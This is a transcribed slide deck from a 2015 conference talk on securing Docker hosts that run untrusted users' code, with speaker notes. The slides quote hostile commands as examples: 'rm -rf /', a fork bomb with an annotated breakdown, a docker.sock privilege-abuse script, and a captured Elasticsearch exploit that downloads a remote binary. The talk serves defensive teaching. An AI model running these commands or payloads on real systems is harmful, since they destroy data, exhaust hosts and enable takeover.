Lessons from running potentially malicious code inside Docker containers
•Download as PPTX, PDF•
3 likes•1,404 views
Lessons from http://www.joinscrapbook.com/ Presented at Container Camp 2015 on 11th September 2015
Recommended
Recommended
More Related Content
What's hot
What's hot (20)
Viewers also liked
Viewers also liked (14)
Similar to Lessons from running potentially malicious code inside Docker containers
Similar to Lessons from running potentially malicious code inside Docker containers (20)
More from Ben Hall
More from Ben Hall (13)
Recently uploaded
Recently uploaded (20)
Lessons from running potentially malicious code inside Docker containers
- 1. Lessons from running potentially malicious code inside containers @Ben_Hall Ben@BenHall.me.uk Ocelot Uproar / Scrapbook
- 2. @Ben_Hall / Blog.BenHall.me.uk Tech Support > Tester > Developer > Founder / Freelancer Software Development Studio WHOAMI?
- 3. “What happens when you give anonymous unrestricted access to a hosted Docker container & daemon?” This is how we [try to] protect ourselves
- 6. Multi-tenant system PaaS CI Servers Untrusted 3rd Parties Docker Security Practices
- 9. $ whoami $ pwd $ cd / $ ls $ apt-get install <some package> $ passwd $ rm –rf /
- 11. Dockerfile RUN adduser <new user> USER <new user> $ docker run –u <new user>
- 12. $ uptime $ free -m $ df -h $ cat /proc/cpuinfo
- 14. If you can ping it, you can try to hack it --icc=false $ cat /etc/hosts 172.17.9.121 st_undefined_x7gd_RrD04w81FSQAANX 172.17.0.220 the-warden.bridge 172.17.9.118 st_nkxqyj_d2d.bridge 172.17.9.119 st_4jm1qk_d2d0 172.17.9.106 angry_blackwell
- 15. $ reboot $ shutdown now
- 17. “It also allows the container to access local network services + like D-bus and is therefore considered insecure” $ docker run --net=host -it ubuntu bash root@ubuntu:/# shutdown now root@ubuntu:/# $ docker run --net=host -it ubuntu bash Post http://docker:4243/v1.20/containers/create: EOF. * Are you trying to connect to a TLS-enabled daemon without TLS? * Is your docker daemon up and running?
- 18. Docker provides a lot out of the box but not everything…
- 19. CPU Shares
- 20. :(){ :|: & };:
- 21. $ docker run -d -u daemon --ulimit nproc=3 busybox top $ docker run -d -u daemon --ulimit nproc=3 busybox top $ docker run -d -u daemon --ulimit nproc=3 busybox top $ docker run -d -u daemon --ulimit nproc=3 busybox top efe086376f3d1b09f6d99fa1af8bfb6e021cdba9b363bd6ac10c07704239b398 Error response from daemon: Cannot start container efe086376f3d1b09f6d99fa1af8bfb6e021cdba9b363bd6ac10c07704239b398 : [8] System error: resource temporarily unavailable
- 22. $ while :; do echo 'Hello World'; done
- 23. $ fallocate Operation Not Supported $ truncate $ dd
- 24. Root users can write to it. If you can write to it, you can fill it. $ ls /docker/aufs/diff/<container-id>/ $ cat /docker/containers/<container-id>/hosts
- 25. Docker & IPTables provides inbound restrictions
- 26. Bandwidth
- 29. $ docker diff $ ~/.bash_history
- 31. Sysdig Very powerful. A lot of data. Built separate auditing service logging commands from users
- 32. The Warden Based on Docker Stats API Snort for Docker?
- 33. A lot more… • Privileged containers open up a world of pain • setuid / setgid • IPTables=false • docker.sock opens a lot of doors • Docker Images containing “presents”
- 34. $ docker run benhall/cute-kittens Error: Missing docker.sock Usage: docker run -v /var/run/docker.sock:/var/run/docker.sock benhall/cute-kittens $ docker run -v /var/run/docker.sock:/var/run/docker.sock benhall/cute-kittens
- 35. if [ -e /var/run/docker.sock ]; then echo "**** Launching ****” docker run --privileged busybox ls /dev echo "**** Cute kittens ****" else echo "Error: Missing docker.sock” fi
- 36. What happens when it all goes wrong?
- 40. org.elasticsearch.search.SearchParseException: [index][3]: query[ConstantScore(*:*)],from[-1],size[1]: Parse Failure [Failed to parse source [{"size":1,"query":{"filtered":{"query":{"match_all":{}}}},"script_fields":{"exp":{"s cript":"import java.util.*;nimport java.io.*;nString str = "";BufferedReader br = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec("wget -O /tmp/xdvi http://<IP Address>:9985/xdvi").getInputStream()));StringBuilder sb = new StringBuilder();while((str=br.readLine())!=null){sb.append(str);}sb.toString();" }}}]] http://blog.benhall.me.uk/2015/09/what-happens-when-an-elasticsearch-container-is-hacked/
- 41. C /bin C /bin/netstat C /bin/ps C /bin/ss C /etc C /etc/init.d A /etc/init.d/DbSecuritySpt A /etc/init.d/selinux C /etc/rc1.d A /etc/rc1.d/S97DbSecuritySpt A /etc/rc1.d/S99selinux C /etc/rc2.d A /etc/rc2.d/S97DbSecuritySpt A /etc/rc2.d/S99selinux C /etc/rc3.d A /etc/rc3.d/S97DbSecuritySpt A /etc/rc3.d/S99selinux C /etc/rc4.d A /etc/rc4.d/S97DbSecuritySpt A /etc/rc4.d/S99selinux C /etc/rc5.d http://blog.benhall.me.uk/2015/09/what-happens-when-an-elasticsearch-container-is-hacked/ A /etc/rc5.d/S97DbSecuritySpt A /etc/rc5.d/S99selinux C /etc/ssh A /etc/ssh/bfgffa A /os6 A /safe64 C /tmp A /tmp/.Mm2 A /tmp/64 A /tmp/6Sxx A /tmp/6Ubb A /tmp/DDos99 A /tmp/cmd.n A /tmp/conf.n A /tmp/ddos8 A /tmp/dp25 A /tmp/frcc A /tmp/gates.lod A /tmp/hkddos A /tmp/hsperfdata_root A /tmp/linux32 A /tmp/linux64 A /tmp/manager A /tmp/moni.lod A /tmp/nb A /tmp/o32 A /tmp/oba A /tmp/okml A /tmp/oni A /tmp/yn25 C /usr C /usr/bin A /usr/bin/.sshd A /usr/bin/dpkgd A /usr/bin/dpkgd/netstat A /usr/bin/dpkgd/ps A /usr/bin/dpkgd/ss
- 42. Is Docker Secure? • Yes. It’s as secure as your practices are. • ElasticSearch hack would have taken over entire box • I’ve pointed out the bad bits • New game, new rules to play by.
Editor's Notes
- Docker doesn’t support Kernel Virtualisation… hence information from host kernel is leaked
- https://github.com/docker/docker/pull/11405 https://github.com/docker/docker/issues/12071 https://github.com/docker/docker/issues/15617
- User namespaces in 1.9 removes net=host https://github.com/dotcloud/docker/issues/6401
- :(){ :|:& };: \_/| |||| ||\- ... the function ':', initiating a chain-reaction: each ':' will start two more. | | |||| |\- Definition ends now, to be able to run ... | | |||| \- End of function-block | | |||\- disown the functions (make them a background process), so that the children of a parent | | ||| will not be killed when the parent gets auto-killed | | ||\- ... another copy of the ':'-function, which has to be loaded into memory. | | || So, ':|:' simply loads two copies of the function, whenever ':' is called | | |\- ... and pipe its output to ... | | \- Load a copy of the function ':' into memory ... | \- Begin of function-definition \- Define the function ':' without any parameters '()' as follows:
- User namespaces in 1.9 removes net=host https://github.com/dotcloud/docker/issues/6401
- https://github.com/docker/docker/pull/11485
- https://github.com/docker/docker/issues/3804
- User namespaces in 1.9 removes net=host https://github.com/dotcloud/docker/issues/6401
- Docker & IPTables allows you some restrictions By-passed via NGrok / reverse proxies. Any Command & Control approaches
- Inbound – Waste bandwidth. Seed files. Outbound – DDoS, BitTorrent, Tor Relays, VPN… Lots of potential legal issues
- Monitors a containers CPU Usage, Disk Space & Bandwidth Sits on each local server. Means it will have priority thanks to CPU share. Communicates over unix socket so no bandwidth issues
- https://github.com/jerbia/container_hack